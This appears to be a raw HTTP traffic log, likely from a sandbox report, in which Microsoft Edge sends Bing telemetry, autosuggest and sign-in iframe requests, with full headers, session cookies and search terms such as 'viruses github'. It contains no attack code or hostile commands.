Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f1c90
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f1dd8
GET

https://www.bing.com/qbox?query=anydde&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=19f223458719487eaf9ca017380efdc9&oit=1&cp=6&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=anydde&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=19f223458719487eaf9ca017380efdc9&oit=1&cp=6&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144332.8b9294d
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144333.8b9298f
POST

https://www.bing.com/orgid/idtoken/conditional

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /orgid/idtoken/conditional HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 693
Cache-Control: max-age=0
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
Origin: https://login.microsoftonline.com
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://login.microsoftonline.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 25
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163cd5c064b978620582407a61cdd
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Qh3xvDYzWasRpgTvu8wyNdenOFaDtMmaiAxAd1BAtaY='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 88217E88D5EB4F89B9F77C4710E09EA1 Ref B: LON601060104052 Ref C: 2024-10-05T16:05:33Z
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:33 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=SID=27AD840365F76F0F12BE910C64686E4D; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144333.8b92a9c
GET

https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /secure/Passport.aspx?popup=1&ssl=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Cache-Control: no-cache,no-store
Pragma: no-cache
Content-Length: 287
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163cdf53e457b870c3ae14a10ec56
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-D+83XLN0dSWWCVeoHVD3J2hxoPvzMQkLfk6wZ1OcgBc='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 3D6519C0804F47E09268078A9168532D Ref B: LON601060104023 Ref C: 2024-10-05T16:05:33Z
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Set-Cookie: .MSA.Auth=; expires=Thu, 01 Jan 1970 00:00:00 GMT; max-age=0; domain=.bing.com; path=/; secure; samesite=lax; httponly
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:33 GMT; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144333.8b92b87
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruses&cp=12&csr=1&zis=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruses&cp=12&csr=1&zis=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
